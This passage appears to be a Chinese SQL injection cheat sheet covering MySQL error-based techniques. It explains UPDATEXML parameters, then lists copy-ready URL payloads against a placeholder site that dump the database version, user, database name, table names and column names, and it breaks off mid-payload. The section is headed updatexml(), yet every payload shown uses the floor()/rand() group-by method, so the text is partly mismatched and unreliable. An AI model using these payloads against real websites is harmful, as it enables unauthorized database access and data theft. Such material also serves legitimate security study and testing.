内容纲要:
1、 updatexml() 报错
2、 extractvalue() 报错
3、 floor()、count(*)、random()报错
4、 name_const() 报错
一、updatexml() 【限制了最大长度为32位】
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc ;
第二个参数:XPath_string (Xpath格式的字符串) ,可以在网上了解Xpath语法;
第三个参数:new_value,String格式,替换查找到的符合条件的数据。
作用:改变文档中符合条件的节点的值
1、select语句注入
爆出版本version()
http://www.xx.com/?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
连接用户user()
http://www.xx.com/?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
数据库名database()
http://www.xx.com/?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
表名
http:// www.xx.com /?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
字段名
http:// www.xx.com /?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x666c6167 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x f